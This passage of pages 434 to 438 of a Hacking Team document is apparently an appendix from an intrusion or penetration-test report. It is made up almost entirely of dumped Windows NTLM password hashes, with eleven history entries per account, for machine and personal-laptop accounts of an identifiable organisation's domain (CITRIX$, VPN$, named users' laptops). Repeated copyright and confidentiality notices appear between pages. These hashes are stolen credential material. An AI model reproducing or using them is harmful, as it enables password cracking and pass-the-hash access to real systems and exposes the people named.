PCMIGRATE$_history_2:1640:NO PASSWORD*********************:339434A3715C63D673E3D23B3CD2532B:::
PCMIGRATE$_history_3:1640:NO PASSWORD*********************:56F09D27300677EE5CA328B1F5CDAD06:::
PCMIGRATE$_history_4:1640:NO PASSWORD*********************:5A4BE53BF676F4B94B248CB49970CE9E:::
PCMIGRATE$_history_5:1640:NO PASSWORD*********************:AC6BE8408318D3C6C804EBFA2FD9D8F6:::
PCMIGRATE$_history_6:1640:NO PASSWORD*********************:67ED30F839AB01A804B22062740A4C62:::
PCMIGRATE$_history_7:1640:NO PASSWORD*********************:A4BEE6DA25066A8D2E9B2D47BA43A7D2:::
PCMIGRATE$_history_8:1640:NO PASSWORD*********************:6DF693369224A6D432703F802991A4A2:::
PCMIGRATE$_history_9:1640:NO PASSWORD*********************:0599BA40EB50D8C95A17BB6CC5ECE679:::
PCMIGRATE$_history_10:1640:NO PASSWORD*********************:503CB5528EDD756F7D75DB3B257E2972:::
MTS-DEMO-2$:1645:NO PASSWORD*********************:52838E15955D3942D9B9822A0CD4DD62:::
MTS-DEMO-2$_history_0:1645:NO PASSWORD*********************:711BA23243DD7999076A138335A3616E:::
MTS-DEMO-2$_history_1:1645:NO PASSWORD*********************:2BF1B0A3DB8A8AB91FB62BB1659B79A8:::
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 434 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
MTS-DEMO-2$_history_2:1645:NO PASSWORD*********************:7B950EFBC5C72AB3BE806044B5D83CC9:::
MTS-DEMO-2$_history_3:1645:NO PASSWORD*********************:D292CED1A398B5330C81164FADC3849C:::
MTS-DEMO-2$_history_4:1645:NO PASSWORD*********************:88EC8AA4442C0D838E220605E715B789:::
MTS-DEMO-2$_history_5:1645:NO PASSWORD*********************:BEF028FF171F4F0EDBFA23744BDDE8DD:::
MTS-DEMO-2$_history_6:1645:NO PASSWORD*********************:D6D49AFDB63022D1F0884C67AC624409:::
MTS-DEMO-2$_history_7:1645:NO PASSWORD*********************:083B9451B97E0EF1752F77E3876583EC:::
MTS-DEMO-2$_history_8:1645:NO PASSWORD*********************:6EAB960D7DD274642CDA7B431E4DA4E8:::
MTS-DEMO-2$_history_9:1645:NO PASSWORD*********************:139D8F32B2D8C1FD5DB6F69C8149DC24:::
MTS-DEMO-2$_history_10:1645:NO PASSWORD*********************:8A36DB96EA447D44E8AD8018430E290A:::
IQUOTER$:1647:NO PASSWORD*********************:A890F21C2CB54E0CDC36278920D2045C:::
IQUOTER$_history_0:1647:NO PASSWORD*********************:0C15D5434BE5CE6045427938E5D27CF6:::
IQUOTER$_history_1:1647:NO PASSWORD*********************:9E579047183EA0B7C7E1057997D4149E:::
IQUOTER$_history_2:1647:NO PASSWORD*********************:96D734A13F9FC6083BFC22A2665F0FFB:::
IQUOTER$_history_3:1647:NO PASSWORD*********************:A347962B2BC542E4435046B3631A6134:::
IQUOTER$_history_4:1647:NO PASSWORD*********************:7988AB7EA74A3A5FBCF7EE7EEF09FE43:::
IQUOTER$_history_5:1647:NO PASSWORD*********************:4C5E18DA1A4D5125C8BB40A5C554134A:::
IQUOTER$_history_6:1647:NO PASSWORD*********************:93F1277992D6B2582B740224F44586A0:::
IQUOTER$_history_7:1647:NO PASSWORD*********************:8E9A7FC5288C57F0EEFD3D6442669AC4:::
IQUOTER$_history_8:1647:NO PASSWORD*********************:095DA9333AFB12B5C8F980571CAEC35F:::
IQUOTER$_history_9:1647:NO PASSWORD*********************:CA3AAD1D8C65A6811C9E28E05D31E8FA:::
IQUOTER$_history_10:1647:NO PASSWORD*********************:A4B703E9AE8EC561B1F36CC406A43162:::
PRICEFEED$:1650:NO PASSWORD*********************:471AD85B76A362DAC950C8C879A9FC0B:::
PRICEFEED$_history_0:1650:NO PASSWORD*********************:D00864B0B0754174266F6025FD4CD688:::
PRICEFEED$_history_1:1650:NO PASSWORD*********************:24835E04335B505FAD14A236436A9DC5:::
PRICEFEED$_history_2:1650:NO PASSWORD*********************:CA2F992F7437ECDCF9C9BD62641DD659:::
PRICEFEED$_history_3:1650:NO PASSWORD*********************:F7BAB7993C0478371C2BC14EAE61A331:::
PRICEFEED$_history_4:1650:NO PASSWORD*********************:DDCD706578A045CCF4B22EE308988789:::
PRICEFEED$_history_5:1650:NO PASSWORD*********************:229E61143C12EFD5CF16C6F397C1219B:::
PRICEFEED$_history_6:1650:NO PASSWORD*********************:C2DC0525916E241CEF303F55EB5D0406:::
PRICEFEED$_history_7:1650:NO PASSWORD*********************:85A3986D5DF4D296A8942622F4F44795:::
PRICEFEED$_history_8:1650:NO PASSWORD*********************:CCC8A91E62DDE08292BBADC38058AE5C:::
PRICEFEED$_history_9:1650:NO PASSWORD*********************:DA989583D68F3AE2D185DB292F98FBFD:::
PRICEFEED$_history_10:1650:NO PASSWORD*********************:DA787B4855704F8B2BFAEBB3A6566AE3:::
VPN$:1651:NO PASSWORD*********************:33ADDD5F01337479610C6B9F265B7C3C:::
VPN$_history_0:1651:NO PASSWORD*********************:E60B22A71B4F1D23B93A346912CD7435:::
VPN$_history_1:1651:NO PASSWORD*********************:73DE5DBAF932B315E0B0B244468FA858:::
VPN$_history_2:1651:NO PASSWORD*********************:F9F7B29750AC0619D4B4E1C42AE53C57:::
VPN$_history_3:1651:NO PASSWORD*********************:FDA9221A4DD27A694ECA11DB59AFEF64:::
VPN$_history_4:1651:NO PASSWORD*********************:DFA775E329502D164E7785D8798367AB:::
VPN$_history_5:1651:NO PASSWORD*********************:2C449645EAB6F9FA75353697EE447AC6:::
VPN$_history_6:1651:NO PASSWORD*********************:D4415E8CE7DEF6A2F1EA890D7FC1FD1F:::
VPN$_history_7:1651:NO PASSWORD*********************:4861C189E3CD92C366B5D0584A7803FB:::
VPN$_history_8:1651:NO PASSWORD*********************:1501407AB638319BFFB90E9BC66621E7:::
VPN$_history_9:1651:NO PASSWORD*********************:5578B1551F1A8777105C39E6105E201B:::
VPN$_history_10:1651:NO PASSWORD*********************:325B866F051A40B024B5AFD88209B09C:::
LONWINCL1N2$:1652:NO PASSWORD*********************:C886628172F68FCF12FDE8E439D12942:::
LONWINCL1N2$_history_0:1652:NO PASSWORD*********************:57D2835432074ADC45D87CDCFD67A704:::
LONWINCL1N2$_history_1:1652:NO PASSWORD*********************:5121C0D158EAC0A2385002BCF3BFCA3F:::
LONWINCL1N2$_history_2:1652:NO PASSWORD*********************:2C43858284C600C95E2C9F6F5D738B58:::
LONWINCL1N2$_history_3:1652:NO PASSWORD*********************:C900E4662CFD7AEA4DD3D16FCEDBC419:::
LONWINCL1N2$_history_4:1652:NO PASSWORD*********************:23EBD1E83A68D330DB4514D9175F62B3:::
LONWINCL1N2$_history_5:1652:NO PASSWORD*********************:0BF295BFD1D2575969FAE9BBE77AC722:::
LONWINCL1N2$_history_6:1652:NO PASSWORD*********************:EB3B6E4EC1CFF964C54EC41C7B1EDC8E:::
LONWINCL1N2$_history_7:1652:NO PASSWORD*********************:E9D8260D98F843B7431BB9C60EF5E64D:::
LONWINCL1N2$_history_8:1652:NO PASSWORD*********************:BA90EE16374174ED0DAD48BDD3862363:::
LONWINCL1N2$_history_9:1652:NO PASSWORD*********************:373C3F9F82115313FE935A73635644C8:::
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 435 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
LONWINCL1N2$_history_10:1652:NO PASSWORD*********************:265A21BA22886A16E278695D2B51AE4E:::
MILLDMS01$:1653:NO PASSWORD*********************:4476722C140B5B555DD3846AE01359D3:::
MILLDMS01$_history_0:1653:NO PASSWORD*********************:7D64060AA50985CB11AD2BAC40DA753C:::
MILLDMS01$_history_1:1653:NO PASSWORD*********************:2D6EB6AA5E5CD75000E4ED811064BC4A:::
MILLDMS01$_history_2:1653:NO PASSWORD*********************:91B760C5AD02F879737FC29355A7497F:::
MILLDMS01$_history_3:1653:NO PASSWORD*********************:A0AB9F3CA6FBB829E307B474C3D98011:::
MILLDMS01$_history_4:1653:NO PASSWORD*********************:6AC8B74C1D861CE824EF67FD38DA4C70:::
MILLDMS01$_history_5:1653:NO PASSWORD*********************:FBC77491A22EFAD939BF8885A74B1102:::
MILLDMS01$_history_6:1653:NO PASSWORD*********************:03BDA4874AA0CC4910BD2B2E6818E982:::
MILLDMS01$_history_7:1653:NO PASSWORD*********************:32D6D9D3A59B7A18CB540B5649E1CE7A:::
MILLDMS01$_history_8:1653:NO PASSWORD*********************:6B311BBD3D545D92DD015ECBB82898AF:::
MILLDMS01$_history_9:1653:NO PASSWORD*********************:8E5B5EBD951321E3897CAE87CEF23E3A:::
MILLDMS01$_history_10:1653:NO PASSWORD*********************:FD06C8731D2080EB5EAC3E5EDA9CD6AF:::
CITRIX$:1654:NO PASSWORD*********************:1A5128FF1FF6F8D14FC300ACE5466C68:::
CITRIX$_history_0:1654:NO PASSWORD*********************:27489476E49675EC3E5E9CAAEFD88756:::
CITRIX$_history_1:1654:NO PASSWORD*********************:5946C71C24A3D4E466D487DEE73EE4BA:::
CITRIX$_history_2:1654:NO PASSWORD*********************:D737550A1B468BE838E21BB080C6936E:::
CITRIX$_history_3:1654:NO PASSWORD*********************:6694265385B6BD6D8DC574861F5B0722:::
CITRIX$_history_4:1654:NO PASSWORD*********************:59AB000F40BBD2D4E68FF33A6AE126EF:::
CITRIX$_history_5:1654:NO PASSWORD*********************:4F0C382CFDF67130971BB53FCB4B2512:::
CITRIX$_history_6:1654:NO PASSWORD*********************:115F35D34D589205A62002232A268FF4:::
CITRIX$_history_7:1654:NO PASSWORD*********************:62A1A275890901DA1BCBBB83FB66852E:::
VAIO-IT$:1655:NO PASSWORD*********************:BEFBFDE22262D1CA6A734946FC3D65EB:::
MILSIAWS06$:1664:NO PASSWORD*********************:65BBFF3C23BDF88B6341C38CE8053BB8:::
MILSIAWS06$_history_0:1664:NO PASSWORD*********************:E31C940083953C0C6DD3EEEACDCC3016:::
MILSIAWS06$_history_1:1664:NO PASSWORD*********************:49AA4C9814132AB422491EB1126FCF78:::
MILSIAWS06$_history_2:1664:NO PASSWORD*********************:70F38DC6A6EF9358D841662154D2ED57:::
MILSIAWS06$_history_3:1664:NO PASSWORD*********************:3BD737D557D8AA5929837F38C7B92C9E:::
MILSIAWS06$_history_4:1664:NO PASSWORD*********************:891A60432CF93CEBCBE77F59F3570605:::
MILSIAWS06$_history_5:1664:NO PASSWORD*********************:A16BC2138B74B29BE7B5E71472974023:::
MILSIAWS06$_history_6:1664:NO PASSWORD*********************:A76751C05932270632638CC3ED311587:::
MILSIAWS06$_history_7:1664:NO PASSWORD*********************:E691CFEE8ADC44141F5A7E036F08742E:::
MILSIAWS06$_history_8:1664:NO PASSWORD*********************:5AE4D627D12474BA81ACAFC2B4696A1A:::
MILSIAWS06$_history_9:1664:NO PASSWORD*********************:FAFA25112672376532D5123304E6C9E7:::
MILSIAWS06$_history_10:1664:NO PASSWORD*********************:E4425E1A7F208A07B880C74E1463E962:::
LGRANDINILAP$:1668:NO PASSWORD*********************:1B403F1976581944C934AFB24D3BA1EA:::
LGRANDINILAP$_history_0:1668:NO PASSWORD*********************:B7F79B8A82BEE25FDD7A855C50D34BEF:::
LGRANDINILAP$_history_1:1668:NO PASSWORD*********************:5671870DB90D2B645E7048CEA0C97DF3:::
BSIMPKINS$:1672:NO PASSWORD*********************:5E7A642D2400C1B89F32C118AF17450D:::
BSIMPKINS$_history_0:1672:NO PASSWORD*********************:BEA2AF30BCD4E48A63FF9CC4A03BCF3B:::
BSIMPKINS$_history_1:1672:NO PASSWORD*********************:BFD4496FC85138CD0B588623EEE053B1:::
BSIMPKINS$_history_2:1672:NO PASSWORD*********************:11F7E4098784BAF0505610694223CCCB:::
BSIMPKINS$_history_3:1672:NO PASSWORD*********************:433F6A820B53151E08EE3AF2E14F1E86:::
BSIMPKINS$_history_4:1672:NO PASSWORD*********************:3BB2E631479AD5CC908291C95D759FBD:::
BSIMPKINS$_history_5:1672:NO PASSWORD*********************:C40684B4D16FAFDA1F1CEB80EE115E5F:::
BSIMPKINS$_history_6:1672:NO PASSWORD*********************:117316054D9E9C567A22F01A261CF2C3:::
BSIMPKINS$_history_7:1672:NO PASSWORD*********************:422BBD50B8AC38FDC49F14608A4CCD1F:::
BSIMPKINS$_history_8:1672:NO PASSWORD*********************:93012970530022B0CB101F06A377A3AC:::
BSIMPKINS$_history_9:1672:NO PASSWORD*********************:A1682A6C028650ABEAA176685361F62C:::
BSIMPKINS$_history_10:1672:NO PASSWORD*********************:B53C94345E13B71AEB30752A41B360C2:::
DBRIZZI$:1673:NO PASSWORD*********************:34E274EB4A57077E41447F8196066BC5:::
DBRIZZI$_history_0:1673:NO PASSWORD*********************:9215D9F9DCA4EAC323AC7F09E7280F8E:::
DBRIZZI$_history_1:1673:NO PASSWORD*********************:FD29A2A5613EAB214482A2BCFCC4B452:::
DBRIZZI$_history_2:1673:NO PASSWORD*********************:F8543B520CE71FDC5BFCE439719DD352:::
DBRIZZI$_history_3:1673:NO PASSWORD*********************:BBFD2BF7460E9EE03B68CAB5F6BC59CD:::
DBRIZZI$_history_4:1673:NO PASSWORD*********************:FD8E511E6D266FD6102CA5031B7683C6:::
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 436 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
DBRIZZI$_history_5:1673:NO PASSWORD*********************:0D838352B5D4DFEF174503D6014C6E15:::
DBRIZZI$_history_6:1673:NO PASSWORD*********************:8D60162CBD57838748A60792BA7CFA68:::
DBRIZZI$_history_7:1673:NO PASSWORD*********************:548D6154062DA2CD55A4522CA64DC1DE:::
DBRIZZI$_history_8:1673:NO PASSWORD*********************:43DF64F4F92EDCED1C871004005BA643:::
DBRIZZI$_history_9:1673:NO PASSWORD*********************:3FFCFE14CC434416F8C14B5BC8B32EDB:::
DBRIZZI$_history_10:1673:NO PASSWORD*********************:DF8DE939C9B6D2D9E5CC81EBCB056A1F:::
MVILLALAP$:1674:NO PASSWORD*********************:D6E39BD5EC223B9A50385063852DE769:::
MVILLALAP$_history_0:1674:NO PASSWORD*********************:E9281CA4F5F12079533E022DB13B6F39:::
MVILLALAP$_history_1:1674:NO PASSWORD*********************:76A7F275CCAAE692624E997A87DC6CA6:::
MVILLALAP$_history_2:1674:NO PASSWORD*********************:61DF4DB537120342492E5558133252ED:::
MVILLALAP$_history_3:1674:NO PASSWORD*********************:38E6D1B17C9F95A2EFED15C599261442:::
MVILLALAP$_history_4:1674:NO PASSWORD*********************:F477B48C2EF832412249FE61CFBB76BF:::
MVILLALAP$_history_5:1674:NO PASSWORD*********************:F453BEB431E6081393C4CA63175ADC33:::
MVILLALAP$_history_6:1674:NO PASSWORD*********************:3FE9D09499F4E6F72D95EBBF36CD79A9:::
MVILLALAP$_history_7:1674:NO PASSWORD*********************:92FE663DE137FA8B588216711FC6354B:::
MVILLALAP$_history_8:1674:NO PASSWORD*********************:B01FFF2731B2B2583D724C7206FDD064:::
MVILLALAP$_history_9:1674:NO PASSWORD*********************:0A5440805C8F78A1F8007C682A57429B:::
MVILLALAP$_history_10:1674:NO PASSWORD*********************:0A68BB8BD36A5FAB0805547F0A0B2801:::
ACARUSO$:1675:NO PASSWORD*********************:01B13AC2E7A832661C778348776FD7EA:::
ACARUSO$_history_0:1675:NO PASSWORD*********************:CD00A4A71647BBE09E9C9D43F1CA096F:::
ACARUSO$_history_1:1675:NO PASSWORD*********************:064678265299C20676312240EDA6BF56:::
ACARUSO$_history_2:1675:NO PASSWORD*********************:EE4DFD8FCA9ABCDF137D36EE49D370A1:::
ACARUSO$_history_3:1675:NO PASSWORD*********************:62FD2F599AD151FAACD81F2045991AC4:::
ACARUSO$_history_4:1675:NO PASSWORD*********************:A3797D844CED92CE9C27321E189F3885:::
BLOOMBERG-MIL$:1676:NO PASSWORD*********************:ABF50B1030D92FF2B3637EE015D6A840:::
BLOOMBERG-MIL$_history_0:1676:NO PASSWORD*********************:A3A57F4FA20A7955E1C8C91050C92DF2:::
BLOOMBERG-MIL$_history_1:1676:NO PASSWORD*********************:C40692A51AEC016D7E7258002F5C2891:::
BLOOMBERG-MIL$_history_2:1676:NO PASSWORD*********************:998D527B25D28EE8C556E3BB35819B4B:::
BLOOMBERG-MIL$_history_3:1676:NO PASSWORD*********************:B7D3E7E1CE9FB66033BD417AEEE7D206:::
BLOOMBERG-MIL$_history_4:1676:NO PASSWORD*********************:4C18880FEBC30AA3B8C47AAFC58984BE:::
BLOOMBERG-MIL$_history_5:1676:NO PASSWORD*********************:52E6F4BFFEEB659945C9E83937A9427C:::
BLOOMBERG-MIL$_history_6:1676:NO PASSWORD*********************:A6BDCC0FF0100442B586C897FF1201FC:::
BLOOMBERG-MIL$_history_7:1676:NO PASSWORD*********************:CAE67FD23A943CA95C38F8FCE50838EF:::
BLOOMBERG-MIL$_history_8:1676:NO PASSWORD*********************:15EC1D2816477E6DD7B5C80821BBFEF9:::
BLOOMBERG-MIL$_history_9:1676:NO PASSWORD*********************:375904E1E00700B986AA8AEB46A2C24B:::
BLOOMBERG-MIL$_history_10:1676:NO PASSWORD*********************:13A7F58EB60BBD3BC33F227840B5F6D1:::
LPELIZZOLA-LAP$:1679:NO PASSWORD*********************:433F291D168B3136340B0468709EEF02:::
LPELIZZOLA-LAP$_history_0:1679:NO PASSWORD*********************:44F44900B03E959416B7F41412345446:::
LPELIZZOLA-LAP$_history_1:1679:NO PASSWORD*********************:84087EFB0C820F72DEFF18B6981542C7:::
LPELIZZOLA-LAP$_history_2:1679:NO PASSWORD*********************:E26A5020801561C982498A65537EA8E7:::
LPELIZZOLA-LAP$_history_3:1679:NO PASSWORD*********************:86BCD93463801B50B9D0D6EC456FD219:::
LPELIZZOLA-LAP$_history_4:1679:NO PASSWORD*********************:DCC3697695C6A95CF11D969FB62ADC48:::
LPELIZZOLA-LAP$_history_5:1679:NO PASSWORD*********************:6488E90E4F441E3020FA5E99884B23D2:::
LPELIZZOLA-LAP$_history_6:1679:NO PASSWORD*********************:8BA0F814E2AC9BC7BF81CA118EA5FF37:::
LPELIZZOLA-LAP$_history_7:1679:NO PASSWORD*********************:3F79E32A4E47F82AC41DE13EAD60E2F9:::
LPELIZZOLA-LAP$_history_8:1679:NO PASSWORD*********************:4617725424934E3DEDDCD3358FC4F3B9:::
LPELIZZOLA-LAP$_history_9:1679:NO PASSWORD*********************:7AA802D4A84F96637579A9F28EDDE819:::
LPELIZZOLA-LAP$_history_10:1679:NO PASSWORD*********************:8DC15E7D7C5E764E1C5ECE51864BBC45:::
ABATTAGLIA-LAP$:1681:NO PASSWORD*********************:200AA73558D75658064B3783D83BEE89:::
ABATTAGLIA-LAP$_history_0:1681:NO PASSWORD*********************:236A5C0B123737BD3FC0172297E7C6AA:::
ABATTAGLIA-LAP$_history_1:1681:NO PASSWORD*********************:243EF9376A12B943EBCA3B6C6E7A6DEE:::
ABATTAGLIA-LAP$_history_2:1681:NO PASSWORD*********************:CA917B50A8E6909759A783FA6BAC6960:::
ABATTAGLIA-LAP$_history_3:1681:NO PASSWORD*********************:A6FE00E2B429A37C376B9016C50A544C:::
ABATTAGLIA-LAP$_history_4:1681:NO PASSWORD*********************:3C167E634A7DC4CF422BCE1BD14DB03C:::
ABATTAGLIA-LAP$_history_5:1681:NO PASSWORD*********************:7EA281E22A3EB19DBFD82227A955516F:::
ABATTAGLIA-LAP$_history_6:1681:NO PASSWORD*********************:A95B3376F1390D9EC4A8A8230D48DD2E:::
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 437 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
ABATTAGLIA-LAP$_history_7:1681:NO PASSWORD*********************:D825A1C260AEB67480FCB73B1F58BD25:::
ABATTAGLIA-LAP$_history_8:1681:NO PASSWORD*********************:83B4FA003A5BC92DD4EFB140D4456E73:::
ABATTAGLIA-LAP$_history_9:1681:NO PASSWORD*********************:3B21776EE264079F74833EC62F7163A0:::
ABATTAGLIA-LAP$_history_10:1681:NO PASSWORD*********************:3ADFD6654085891F4F869A10FCA55927:::
B2C-LAP$:1682:NO PASSWORD*********************:B76410ED610A31F0F0C1CB53AD54A39E:::
B2C-LAP$_history_0:1682:NO PASSWORD*********************:4C2359BE5FCE1FE3B3FB5700970B944E:::
B2C-LAP$_history_1:1682:NO PASSWORD*********************:E8ED6BFA248340EF2364943F16F1279A:::
B2C-LAP$_history_2:1682:NO PASSWORD*********************:9C6F2FE46E979ECD9373657212D223D4:::
B2C-LAP$_history_3:1682:NO PASSWORD*********************:F0D7F435879EF43552833A738D60BB30:::
B2C-LAP$_history_4:1682:NO PASSWORD*********************:E1FFBD940F2DC4B3BCA3F2AF3F54911A:::
GALESSANDRO-LAP$:1684:NO PASSWORD*********************:A0352484DD36C94BDD602294036E3F5D:::
GALESSANDRO-LAP$_history_0:1684:NO PASSWORD*********************:565598BB008749F57574E2E85E7E0E2D:::
GALESSANDRO-LAP$_history_1:1684:NO PASSWORD*********************:7843E44D106C435E7C0B7C86D7D797DB:::
GALESSANDRO-LAP$_history_2:1684:NO PASSWORD*********************:D3E75DED54EAFCE31E55E823476FB51B:::
GALESSANDRO-LAP$_history_3:1684:NO PASSWORD*********************:CCAD319B32B2E5F87372384BACFA9E79:::
GALESSANDRO-LAP$_history_4:1684:NO PASSWORD*********************:FCFACAA6C73C76FBB173FB56C8826716:::
GALESSANDRO-LAP$_history_5:1684:NO PASSWORD*********************:2B6D750E2530D702BCA3097F351800BB:::
GALESSANDRO-LAP$_history_6:1684:NO PASSWORD*********************:4B09D7183921A4CD9241459EC6537558:::
GALESSANDRO-LAP$_history_7:1684:NO PASSWORD*********************:FCED0BF4FEF4BB4762F201EAF82750D3:::
GALESSANDRO-LAP$_history_8:1684:NO PASSWORD*********************:6EBC2D468DEFE0F3A44331CBBBDD7EB1:::
GALESSANDRO-LAP$_history_9:1684:NO PASSWORD*********************:A35801DE65E5A4F6B3AF7B7C7A094E9B:::
GALESSANDRO-LAP$_history_10:1684:NO PASSWORD*********************:0CE12121A30659A6E7A1FDAFB197FD97:::
DORTELLI1$:1685:NO PASSWORD*********************:CBE484E43A07F82FE162F70BE8A680BB:::
DORTELLI1$_history_0:1685:NO PASSWORD*********************:FDF1ACEB52C48484EC5F1B3994C1F18A:::
DORTELLI1$_history_1:1685:NO PASSWORD*********************:CE9A8C79072B9FBC4D1F65349D3E0A21:::
DORTELLI1$_history_2:1685:NO PASSWORD*********************:C028C8CD404EF845380ABB6BD6C58B99:::
DORTELLI1$_history_3:1685:NO PASSWORD*********************:A96B62DC820D558E9A7D062D7CC6F849:::
DORTELLI1$_history_4:1685:NO PASSWORD*********************:A4E083F3B64DCB0CB36943422D559739:::
DORTELLI1$_history_5:1685:NO PASSWORD*********************:2786489F127991F6AB24FFDEB988E89A:::
DORTELLI1$_history_6:1685:NO PASSWORD*********************:49AA33F81DA94C17CDCBA7688319EA4D:::
DORTELLI1$_history_7:1685:NO PASSWORD*********************:7286F912F300587B8BD1B31223FC0AFF:::
DORTELLI1$_history_8:1685:NO PASSWORD*********************:03EA1390131F55622CB1ABD378B175C3:::
DORTELLI1$_history_9:1685:NO PASSWORD*********************:9E8F81D213454A246BDCB0C1D6076425:::
DORTELLI1$_history_10:1685:NO PASSWORD*********************:54D78C2726E91CEB6CB0580C42D8F4D9:::
ASANTANGELO$:1687:NO PASSWORD*********************:6636AF459441478ABA0F91BFCC84CE68:::
ASANTANGELO$_history_0:1687:NO PASSWORD*********************:ACC52F74B95D7DAC0294023CF17BBD7F:::
ASANTANGELO$_history_1:1687:NO PASSWORD*********************:92B99270C40A303B61CB0D7C95AB2CB1:::
ASANTANGELO$_history_2:1687:NO PASSWORD*********************:B4FD7C40E64AD85C700B7C85D7F38073:::
ASANTANGELO$_history_3:1687:NO PASSWORD*********************:82758741DA3B9E0758746192A354B3FE:::
ASANTANGELO$_history_4:1687:NO PASSWORD*********************:E2FD0417814C62D866DAA401E01B8072:::
ASANTANGELO$_history_5:1687:NO PASSWORD*********************:FB340D1D6AE90AFE02118DF01177AC59:::
ASANTANGELO$_history_6:1687:NO PASSWORD*********************:5DD032B573C8F3A9FB5E62285642281C:::
ASANTANGELO$_history_7:1687:NO PASSWORD*********************:B6CADC62C3DB64535F5DA1D68A3959B7:::
ASANTANGELO$_history_8:1687:NO PASSWORD*********************:307FB7D4318EE8C92C3B37AF13AE128B:::
ASANTANGELO$_history_9:1687:NO PASSWORD*********************:5E8F071EAAA4F8D56695EAE5C70DD428:::
ASANTANGELO$_history_10:1687:NO PASSWORD*********************:9546052B50066AFD0A5842566B711EBF:::
LMENEGHESSO-LAP$:1692:NO PASSWORD*********************:ACCD171524084A0EDD147E6C7894A800:::
LMENEGHESSO-LAP$_history_0:1692:NO PASSWORD*********************:E4AF2EAC1EDC725B5B98863F901E3D79:::
LMENEGHESSO-LAP$_history_1:1692:NO PASSWORD*********************:573992118BA44384297B1C06E3E971D9:::
LMENEGHESSO-LAP$_history_2:1692:NO PASSWORD*********************:9C11195D2BBF36829CAEDD9DC71A3775:::
LMENEGHESSO-LAP$_history_3:1692:NO PASSWORD*********************:7A312EF5558482B6A84FF32754229C7B:::
LMENEGHESSO-LAP$_history_4:1692:NO PASSWORD*********************:49A9E5F39C72605E399560C9895120E8:::
LMENEGHESSO-LAP$_history_5:1692:NO PASSWORD*********************:F78ECE5C05D3F6A6461BF31ADC905F2F:::
LMENEGHESSO-LAP$_history_6:1692:NO PASSWORD*********************:820B6333DB26D46EB8AF394673834312:::
LMENEGHESSO-LAP$_history_7:1692:NO PASSWORD*********************:F2593A63A318353CFC730913A8933E16:::
LMENEGHESSO-LAP$_history_8:1692:NO PASSWORD*********************:4FF502DA010049CE63748BA64382B77E:::
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 438 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
LMENEGHESSO-LAP$_history_9:1692:NO PASSWORD*********************:FB9E372AF07D2374702294A9D2A556C5:::
LMENEGHESSO-LAP$_history_10:1692:NO PASSWORD*********************:518165EDC7826E2A83BF3DC5A06C3554:::
CBOURDILLON$:1695:NO PASSWORD*********************:93275FC5AC2FE2C6C50931A32051821D:::
CBOURDILLON$_history_0:1695:NO PASSWORD*********************:0DC47F4D2A19BAB86BA0020C91C238CD:::
CBOURDILLON$_history_1:1695:NO PASSWORD*********************:D2E6604029564F24A93796650C78F429:::
CBOURDILLON$_history_2:1695:NO PASSWORD*********************:23EED8F9F653F302FB098DA4FB93338C:::
CBOURDILLON$_history_3:1695:NO PASSWORD*********************:415D9EAA326D6FE7AAF8A53037EFABD1:::
CBOURDILLON$_history_4:1695:NO PASSWORD*********************:6DD02B7DD1FBA13C1CF3225FD9E87E6A:::
CBOURDILLON$_history_5:1695:NO PASSWORD*********************:73DE61EDB3494591C7FB50D5E53E2742:::
CBOURDILLON$_history_6:1695:NO PASSWORD*********************:4DD9BE2DE831F25D92EA52012E90EA22:::
CBOURDILLON$_history_7:1695:NO PASSWORD*********************:20B986B1AA2B01D835A8772A3C3137F4:::
CBOURDILLON$_history_8:1695:NO PASSWORD*********************:9D2EFDD4D3643F26545395BE7EB7C9F4:::
CBOURDILLON$_history_9:1695:NO PASSWORD*********************:37AE603257EB18C93547E3C23848FF46:::
CBOURDILLON$_history_10:1695:NO PASSWORD*********************:04DB804F5B6304D6B302DD949462FC80:::
ATIRASSA-LAP$:1696:NO PASSWORD*********************:E9460B97234F9A6B006739FA5A385E5A:::
ATIRASSA-LAP$_history_0:1696:NO PASSWORD*********************:420DFF8287156393BEEB9E76C39FAADF:::
ATIRASSA-LAP$_history_1:1696:NO PASSWORD*********************:C3D61C4FB90D74514264C6548EC6903B:::
ATIRASSA-LAP$_history_2:1696:NO PASSWORD*********************:6B85F39D78EFCFA3EFF9102993ED12A2:::
ATIRASSA-LAP$_history_3:1696:NO PASSWORD*********************:07064DDEC15FD147821BB5ED1B04B07A:::
ATIRASSA-LAP$_history_4:1696:NO PASSWORD*********************:18F4F5FC7724C1E8D3588CBA64B9501D:::
ATIRASSA-LAP$_history_5:1696:NO PASSWORD*********************:56728BA870F23D782CD0482324B55F89:::
ATIRASSA-LAP$_history_6:1696:NO PASSWORD*********************:2E1B9C1E4A0140BF08B783EC8F5E8B24:::
ATIRASSA-LAP$_history_7:1696:NO PASSWORD*********************:AD4B271C9A264EA90E773F818495A098:::
ATIRASSA-LAP$_history_8:1696:NO PASSWORD*********************:0590825F365B08072519AB792820801B:::
ATIRASSA-LAP$_history_9:1696:NO PASSWORD*********************:E78A2A060DA52B51ABA079FFC7C0E6A4:::
ATIRASSA-LAP$_history_10:1696:NO PASSWORD*********************:F3E0B90EA4D54E99483296DFE3186741:::
MILSIAWS05$:1699:NO PASSWORD*********************:B991B49AC2B855A78499BBA1D5C2DE64:::
MILSIAWS05$_history_0:1699:NO PASSWORD*********************:428E2DB8724EF10A27DF2AA6B7D168A7:::
